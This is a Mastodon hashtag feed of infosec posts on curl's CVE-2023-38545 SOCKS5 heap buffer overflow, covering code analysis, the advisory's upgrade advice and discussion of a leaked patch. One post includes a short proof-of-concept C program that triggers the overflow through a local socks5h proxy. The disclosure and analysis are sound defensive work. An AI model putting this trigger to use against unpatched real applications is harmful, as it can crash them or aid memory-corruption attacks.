Martin Boller :debian: :tux: :freebsd: :windows: :mastodon:<p>Forgive me, I was left unsupervised.</p><p><a href="https://www.infosecworrier.dk/blog/2023/10/VulnMgmt.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">infosecworrier.dk/blog/2023/10</span><span class="invisible">/VulnMgmt.html</span></a></p><p><a href="https://infosec.exchange/tags/VulnerabilityManagement" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>VulnerabilityManagement</span></a> <a href="https://infosec.exchange/tags/CVE202338545" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CVE202338545</span></a> <a href="https://infosec.exchange/tags/curl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>curl</span></a> <a href="https://infosec.exchange/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://infosec.exchange/tags/CriticalInfrastructure" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CriticalInfrastructure</span></a> <a href="https://infosec.exchange/tags/rant" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rant</span></a> <a href="https://infosec.exchange/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://infosec.exchange/tags/Cyber" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cyber</span></a> <a href="https://infosec.exchange/tags/OT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OT</span></a> <a href="https://infosec.exchange/tags/Context" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Context</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/CTI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CTI</span></a></p>
#cve202338545
0 posts0 participants0 posts today
Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?
The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.
The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.
Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:
bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:
/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}
But this check is *only* done in INIT state. When the state is anything else, the initial value is used.
Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:
if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.
There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.
Si vous me cherchez, je suis en train de mettre à jour curl.
"
curl Vulnerability Alert: SOCKS5 Heap Buffer Overflow "
A critical heap buffer overflow vulnerability has been identified in curl, specifically in the SOCKS5 proxy handshake. When curl is instructed to pass the hostname to the SOCKS5 proxy for resolution, a hostname exceeding 255 bytes should trigger local name resolving. However, due to a bug, a slow SOCKS5 handshake might erroneously copy an overly long hostname to the target buffer instead of just the resolved address, causing a potential overflow. 
This flaw, tagged as CVE-2023-38545, affects libcurl versions 7.69.0 to 8.3.0 and has been assigned a high severity rating. The vulnerability was introduced when the SOCKS5 handshake code transitioned from a blocking function to a non-blocking state machine. The issue has been resolved in curl version 8.4.0, and users are urged to upgrade or apply patches to mitigate risks. 
Source: curl - CVE-2023-38545
Tags: #curl #Vulnerability #Cybersecurity #CVE202338545 #BufferOverflow #InfoSec #PatchManagement #CyberHygiene
Credits: Reported and patched by Jay Satiro. A heartfelt thanks to Jay for enhancing the security of the digital realm!
Recommendations:
- Upgrade: Update curl to version 8.4.0 or a newer release where the issue is fixed.
- Patch: If upgrading is not feasible, consider applying the provided patch to your local version of curl.
- Proxy Configuration: Avoid using CURLPROXY_SOCKS5_HOSTNAME proxies with curl.
- Environment Variables: Do not set proxy environment variables to socks5h://.
curl.securl - SOCKS5 heap buffer overflow - CVE-2023-38545
#curl CVE turned out to be not very exciting nor severe. Similar to the OpenSSL "critical" bug earlier, you mostly just see people hyping up pre-disclosures to be early on that hype train.
Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:
gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out
Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.
Hm. "around 06:00 UTC" zieht sich... #libcurl #cve202338545
It's unfortunate that the #curl #CVE202338545 patch leaked some hours before the official release. While this is embarrassing for the party who leaked it, accidents will happen. In this case the window for potential mischief is fortunately quite small. #infosec
Continued thread
Over on the bad place, it looks like an embargoed patch leaked?
X (formerly Twitter)John Hammond on Xcurl/libcurl HIGH CVE-2023-38545 seemed to have a patch diff out early?
https://t.co/HMsoNJyzme
Continued thread
Living post 2: general curl vuln prep links
Ongoing summary of Oct 2023 curl vulnerabilities
My prediction for tomorrow: A lot of people will call the high level #curl security #vulnerability #CVE202338545 irrelevant since it doesn’t affect them. The important part is that curl is used in a lot of places and in wildly different configurations and use patterns, some of which will be impacted. For them the issue is hardly irrelevant. The reason these serious vulnerabilities need to be highlighted is to ensure that those affected will get the fix in as soon as possible.
As pointed out by @bagder “This is a HIGH severity problem but there is still going to be a large chunk of users who will not be affected by these problems.”
If you’re not impacted, good. But let’s ensure that those that are, will get the fix in as soon as possible.
Linux patching is a pain, but you should be aware of the latest curl vulnerability that has been annouced.
https://github.com/curl/curl/discussions/12026
#security #curl #vulnerabilitymanagement #CVE202338545
GitHubSeverity HIGH security problem to be announced with curl 8.4.0 on Oct 11 · curl/curl · Discussion #12026We are cutting the release cycle short and will release curl 8.4.0 on October 11, including fixes for a severity HIGH CVE and one severity LOW. The one rated HIGH is probably the worst curl securit...